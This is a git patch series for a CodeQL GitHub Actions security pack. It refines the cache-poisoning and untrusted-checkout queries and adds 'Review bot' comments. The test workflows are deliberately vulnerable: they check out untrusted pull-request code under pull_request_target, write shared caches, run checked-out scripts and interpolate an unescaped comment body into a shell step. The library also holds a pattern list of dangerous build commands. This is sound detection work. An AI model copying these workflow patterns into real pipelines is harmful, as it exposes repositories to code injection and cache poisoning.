@@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: read-all + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml index 2c684b6a02d5..fa56d074936b 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -2,6 +2,8 @@ name: Cache Poisoning on: pull_request_target +permissions: {} + jobs: poison: runs-on: ubuntu-latest diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml index b5ea127ebd32..03eb9e99f0f2 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml @@ -2,9 +2,13 @@ name: Cache Poisoning on: pull_request_target +permissions: + contents: read + jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml index 9bc6cc980562..b7454d0a0dc1 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml @@ -5,6 +5,8 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: + contents: read steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml index b5ef835210bc..2fa898982bcd 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml 
@@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml index d0ff8c180fe2..be83f83cf30b 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml @@ -5,6 +5,7 @@ on: pull_request_target jobs: poison: runs-on: ubuntu-latest + permissions: read-all steps: - uses: actions/checkout@v3 with: diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml index 68d3f7f75ac4..05f8e4a067a1 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -5,15 +5,33 @@ on: jobs: pr-comment: runs-on: ubuntu-latest + permissions: read-all steps: - uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - uses: actions/checkout@v3 - if: success() with: ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: ./checkedout/poison - - run: | - ./checkedout/poison + pr-comment2: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - uses: ./.github/actions/node-npm-setup + pr-comment3: + runs-on: ubuntu-latest + permissions: read-all + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - run: node .github/actions-scripts/what-docs-early-access-branch.js 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml index 3b646b795ac2..9f19634abc92 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml @@ -4,8 +4,8 @@ on: jobs: pr-comment: + permissions: read-all runs-on: ubuntu-latest - permissions: {} steps: - run: | echo ${{ github.event.comment.body }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 67cdea32c5d1..841a3ee40712 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,6 +1,8 @@ -| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. 
| .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected index 5f244aa2faf8..60c25e1cd92a 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -1,6 +1,7 @@ edges nodes | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test10.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected index ff65e1658125..ca86bac14f0e 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.expected @@ -1,3 +1,4 @@ +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected index dc5a6bc915fc..a40ab1fa771b 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.expected @@ -1,4 +1,3 @@ -j .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1ea0312f362e90cb43895ae235884cc26f3684a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:35:25 +0200 Subject: [PATCH 257/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f07d6c40046c..e68a4c67cc4f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.21 +version: 0.0.22 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 13f053a40da4..465be503e7c3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.21 +version: 0.0.22 groups: - actions - queries From d6fb0ae84ed1dfd7f829fc2f4a4d6228863f05dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:41:05 +0200 Subject: [PATCH 258/707] Update tests --- .../Security/CWE-349/CachePoisoning.expected | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 841a3ee40712..75a370246cba 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,8 +1,8 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Untrusted checked-out code may lead to cache poisoning on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. 
| .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | From a30c2aa5def74c81e84f2ae8eff890ca8f615e49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 9 May 2024 23:32:21 +0200 Subject: [PATCH 259/707] Update PoisonableSteps --- .../actions/security/PoisonableSteps.qll | 26 ++++++++++++++----- 1 file changed, 19 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index f65bf5fb4dc8..070dcbda5329 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -18,8 +18,8 @@ private string dangerousCommands() { [ "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", - "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", - "^ant ", "mkdocs build", "pytest" + "msbuild ", "mvn ", "gradle ", "bundle install", "bundle exec ", "^ant ", "mkdocs build", + "pytest", "pip install -r ", "pip install --requirement", "java -jar " ] } @@ -31,21 +31,33 @@ class BuildRunStep extends PoisonableStep, Run { } } +bindingset[cmdRegexp] +string wrapLocalCmd(string cmdRegexp) { result = "(^|;\\s*|\\s+)" + cmdRegexp + "(\\s+|;|$)" } + class LocalCommandExecutionRunStep extends PoisonableStep, Run { string cmd; LocalCommandExecutionRunStep() { // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, ... exists(string line | line = this.getScript().splitAt("\n").trim() | // ./xxxx - cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2) + // TODO: It could also be in the form of `dir/cmd` + cmd = line.regexpCapture(wrapLocalCmd("\\.\\/(.*)"), 2) or // sh xxxx - cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + cmd = line.regexpCapture(wrapLocalCmd("(ba|z|fi)?sh\\s+(.*)"), 3) + or + // node xxxx.js + cmd = line.regexpCapture(wrapLocalCmd("node\\s+(.*)(\\.js|\\.ts)"), 2) + or + // python xxxx.py + cmd = line.regexpCapture(wrapLocalCmd("python\\s+(.*)\\.py"), 2) + or + // ruby xxxx.rb + cmd = line.regexpCapture(wrapLocalCmd("ruby\\s+(.*)\\.rb"), 2) or - // node xxxx - cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) + // go xxxx.go + cmd = line.regexpCapture(wrapLocalCmd("go\\s+(.*)\\.go"), 2) ) } From 4d612044049e206bba6f01c49c9e49937c3b33ac Mon Sep 17 00:00:00 2001 
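Review bot: `./mvnw ` and `./gradlew ` are dropped from `dangerousCommands()` with nothing in this hunk saying why; presumably the `./` rule in `LocalCommandExecutionRunStep` (next hunk) now covers them, and a comment such as `// ./mvnw, ./gradlew etc. are matched by LocalCommandExecutionRunStep` would stop someone re-adding them. The entries are regular expressions (cf. `^ant ` and `npm ci(\\b|$)`), so the trailing literal space in `"pip install -r "` and `"java -jar "` is a stricter separator than the `\\s+` the other hunk uses; harmless but inconsistent. How the list is assembled into a match is outside the hunk, so whether a local `pip install .`-style install of the checked-out package is meant to be in scope cannot be judged here; if it is deliberately omitted, note it.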
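Review bot: `regexpCapture` matches the regular expression against the whole string, so the `;\\s*` and `\\s+` alternatives that `wrapLocalCmd` puts in front of the command can only match at position 0 of an already-trimmed `line`; a command that follows `&&`, `;` or another command (e.g. `npm ci && ./build.sh`) is not captured, and the trailing `(\\s+|;|$)` likewise forces the match to end at the line end, so `python build.py --release` fails for every pattern that ends in an extension. Allow a prefix and a suffix on both sides: `result = "(^|.*[;&|]\\s*|.*\\s+)" + cmdRegexp + "(\\s.*|;.*|$)"`; the capture-group numbers the callers use (2 and 3) are unchanged because the prefix is still a single group. The class also lacks a doc comment stating the heuristic's intent, e.g. `/** A run step that executes a script or binary from the checked-out tree via ./, sh, node, python, ruby or go. */`. The class continues outside the hunk.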
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:25 +0200 Subject: [PATCH 260/707] New tests --- ql/test/library-tests/test.expected | 14 ++++++++++++ .../CWE-349/.github/workflows/test13.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test14.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test15.yml | 22 +++++++++++++++++++ .../CWE-349/.github/workflows/test16.yml | 22 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 ++ 6 files changed, 104 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c735596ae053..61f7120e78e9 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -98,6 +98,10 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | 
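Review bot: The added `parentNodes` rows record `issue_comment` as its own parent three times and duplicate the existing `issue_comment | on: issue_comment` row, and the hunk at `@@ -163,6 +173,10 @@` does the same for `push`; a node being its own parent is almost certainly a regression in the parent relation for scalar triggers that has been baked into the baseline rather than fixed. Before accepting this baseline, check how the parent of a trigger node is computed (the change is not in this series) and de-duplicate; expected output should not contain self-edges. The `multiline.yml` rows in `@@ -136,8 +140,14 @@`, which add `workflow_run` as a parent, look legitimate by contrast.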
@@ -136,8 +140,14 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | 
@@ -163,6 +173,10 @@ parentNodes | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml new file mode 100644 index 000000000000..72106b9d69b5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml new file mode 100644 index 000000000000..31c820904cdb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml new file mode 100644 index 000000000000..d3f51456de2d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches: + - main + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml new file mode 100644 index 000000000000..ec0f9b0e6c94 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml @@ -0,0 +1,22 @@ +name: Cache Poisoning + +on: + pull_request_target: + branches-ignore: + - foo + +permissions: read-all + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison 
diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 75a370246cba..f0ee6d700014 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -6,3 +6,5 @@ | .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | From 8590a0ba8fbf99e48f58d40eeb7bb33212f0a253 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 10 May 2024 14:12:54 +0200 Subject: [PATCH 261/707] Refactor runOnDefaultBranch --- .../actions/security/CachePoisoningQuery.qll | 50 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 14 +----- .../CWE-349/CachePoisoningByCodeInjection.ql | 15 +----- 3 files changed, 53 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 9762e9d90784..5ac2a855e9f4 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
+++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,6 +10,56 @@ string defaultBranchTriggerEvent() { ] } +predicate test(Event e) { + e.getName() = "pull_request_target" and + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] +} + +predicate runsOnDefaultBranch(Job j) { + exists(Event e | + j.getATriggerEvent() = e and + ( + e.getName() = defaultBranchTriggerEvent() and + not e.getName() = "pull_request_target" + or + e.getName() = "push" and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + e.getName() = "pull_request_target" and + ( + // no filtering + not e.hasProperty("branches") and not e.hasProperty("branches-ignore") + or + // only branches-ignore filter + e.hasProperty("branches-ignore") and + not e.hasProperty("branches") and + not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + or + // only branches filter + e.hasProperty("branches") and + not e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] + or + // branches and branches-ignore filters + e.hasProperty("branches") and + e.hasProperty("branches-ignore") and + e.getAPropertyValue("branches") = ["main", "master", "default"] and + not 